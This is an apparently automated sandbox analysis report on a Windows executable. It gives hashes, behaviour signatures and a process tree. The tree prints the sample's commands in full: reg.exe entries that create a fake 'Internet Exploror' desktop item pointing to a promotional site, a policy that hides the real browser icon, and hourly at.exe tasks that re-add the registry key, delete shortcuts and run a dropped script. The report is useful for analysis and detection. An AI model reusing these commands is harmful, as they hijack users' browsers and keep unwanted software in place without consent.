Analysis

  • max time kernel
    140s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-10-2024 08:20

General

  • Target

    826ce26115a65a51cc3919ebb27bd7a2_JaffaCakes118.exe

  • Size

    100KB

  • MD5

    826ce26115a65a51cc3919ebb27bd7a2

  • SHA1

    af7bef47c29b93748c79e72cb48c9aea5b0fffb6

  • SHA256

    ea1ad2ca0aa5fec282b115c32372b5ad893d3702dcf12b505be35e0e84a4de96

  • SHA512

    aa553eb4b4bef24e22cb08ec0e69649ad6a7411d887c00405005b697fefdccaccfeca03aa3f8f0931f089ac331be2273c0c979e80956543cd61be19eb6b93933

  • SSDEEP

    1536:5e4t7WXCBJrs6h65lUwzFrANEyczrUy9/G6aqK1U3zwGJdy0zCEU:E4tWMJJh6fryYP/daqA8zfix

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Service Discovery 1 TTPs 2 IoCs

    Adversaries may try to gather information about registered local system services.

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies registry class 45 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\826ce26115a65a51cc3919ebb27bd7a2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\826ce26115a65a51cc3919ebb27bd7a2_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3616
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\huacai.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C start /min iexplore http://4555.net/index2.html?huacai
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://4555.net/index2.html?huacai
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4884
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4884 CREDAT:17410 /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1984
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C .\to.cmd
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4148
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1892
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          4⤵
          • Modifies registry class
          PID:684
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1288
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4184
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:844
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1580
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
          4⤵
          • Modifies registry class
          PID:1912
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
          4⤵
          • Modifies registry class
          PID:4620
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
          4⤵
          • Modifies registry class
          PID:2348
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4976
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
          4⤵
          • Modifies registry class
          PID:316
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
          4⤵
          • Modifies registry class
          PID:700
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
          4⤵
          • Modifies registry class
          PID:2640
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1052
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.4555.net/?ha" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4652
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
          4⤵
          • Modifies registry class
          PID:212
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2248
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.4555.net/?ha" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1864
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:372
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:5056
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2628
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4320
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2180
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
          4⤵
            PID:1684
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C .\copy.cmd
          3⤵
          • Drops file in Program Files directory
          PID:1392
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C .\run.cmd
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4080
          • C:\Windows\SysWOW64\sc.exe
            sc config Schedule start= auto
            4⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1860
          • C:\Windows\SysWOW64\net.exe
            net start "Task Scheduler"
            4⤵
            • System Location Discovery: System Language Discovery
            • System Service Discovery
            PID:4392
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start "Task Scheduler"
              5⤵
              • System Location Discovery: System Language Discovery
              • System Service Discovery
              PID:3712
          • C:\Windows\SysWOW64\at.exe
            at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2188
          • C:\Windows\SysWOW64\at.exe
            at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
            4⤵
              PID:3856
            • C:\Windows\SysWOW64\at.exe
              at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4504
            • C:\Windows\SysWOW64\at.exe
              at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4288
            • C:\Windows\SysWOW64\at.exe
              at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
              4⤵
                PID:4264
              • C:\Windows\SysWOW64\at.exe
                at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3116
              • C:\Windows\SysWOW64\at.exe
                at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                4⤵
                  PID:2088
                • C:\Windows\SysWOW64\at.exe
                  at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3992
                • C:\Windows\SysWOW64\at.exe
                  at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4912
                • C:\Windows\SysWOW64\at.exe
                  at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:5032
                • C:\Windows\SysWOW64\at.exe
                  at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                  4⤵
                    PID:788
                  • C:\Windows\SysWOW64\at.exe
                    at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4996
                  • C:\Windows\SysWOW64\at.exe
                    at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                    4⤵
                      PID:2444
                    • C:\Windows\SysWOW64\at.exe
                      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2156
                    • C:\Windows\SysWOW64\at.exe
                      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4292
                    • C:\Windows\SysWOW64\at.exe
                      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                      4⤵
                        PID:2960
                      • C:\Windows\SysWOW64\at.exe
                        at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4380
                      • C:\Windows\SysWOW64\at.exe
                        at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                        4⤵
                          PID:4172
                        • C:\Windows\SysWOW64\at.exe
                          at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:660
                        • C:\Windows\SysWOW64\at.exe
                          at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2588
                        • C:\Windows\SysWOW64\at.exe
                          at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                          4⤵
                            PID:1384
                          • C:\Windows\SysWOW64\at.exe
                            at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                            4⤵
                              PID:1712
                            • C:\Windows\SysWOW64\at.exe
                              at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2964
                            • C:\Windows\SysWOW64\at.exe
                              at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                              4⤵
                                PID:2224
                              • C:\Windows\SysWOW64\at.exe
                                at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4360
                              • C:\Windows\SysWOW64\at.exe
                                at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1560
                              • C:\Windows\SysWOW64\at.exe
                                at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:880
                              • C:\Windows\SysWOW64\at.exe
                                at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2308
                              • C:\Windows\SysWOW64\at.exe
                                at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1608
                              • C:\Windows\SysWOW64\at.exe
                                at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2760
                              • C:\Windows\SysWOW64\at.exe
                                at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3500
                              • C:\Windows\SysWOW64\at.exe
                                at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                4⤵
                                  PID:2648
                                • C:\Windows\SysWOW64\at.exe
                                  at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4120
                                • C:\Windows\SysWOW64\at.exe
                                  at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                  4⤵
                                    PID:3944
                                  • C:\Windows\SysWOW64\at.exe
                                    at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3520
                                  • C:\Windows\SysWOW64\at.exe
                                    at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                    4⤵
                                      PID:3552
                                    • C:\Windows\SysWOW64\at.exe
                                      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                      4⤵
                                        PID:3428
                                      • C:\Windows\SysWOW64\at.exe
                                        at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                        4⤵
                                          PID:3128
                                        • C:\Windows\SysWOW64\at.exe
                                          at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3880
                                        • C:\Windows\SysWOW64\at.exe
                                          at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                          4⤵
                                            PID:2956
                                          • C:\Windows\SysWOW64\at.exe
                                            at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                            4⤵
                                              PID:3908
                                            • C:\Windows\SysWOW64\at.exe
                                              at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                              4⤵
                                                PID:4060
                                              • C:\Windows\SysWOW64\at.exe
                                                at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:228
                                              • C:\Windows\SysWOW64\at.exe
                                                at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4428
                                              • C:\Windows\SysWOW64\at.exe
                                                at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2572
                                              • C:\Windows\SysWOW64\at.exe
                                                at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                4⤵
                                                  PID:3536
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                                  4⤵
                                                    PID:3420
                                                  • C:\Windows\SysWOW64\at.exe
                                                    at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                                    4⤵
                                                      PID:948
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1220
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Explore*.*"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4772
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4496
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                      4⤵
                                                        PID:5012
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Σ»└└*.*"
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4012
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:748
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3396
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2196
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explore\Quick Launch\*Σ»└└*.*"
                                                        4⤵
                                                          PID:4164
                                                        • C:\Windows\SysWOW64\at.exe
                                                          at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
                                                          4⤵
                                                            PID:952
                                                          • C:\Windows\SysWOW64\at.exe
                                                            at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                            4⤵
                                                              PID:4288
                                                            • C:\Windows\SysWOW64\at.exe
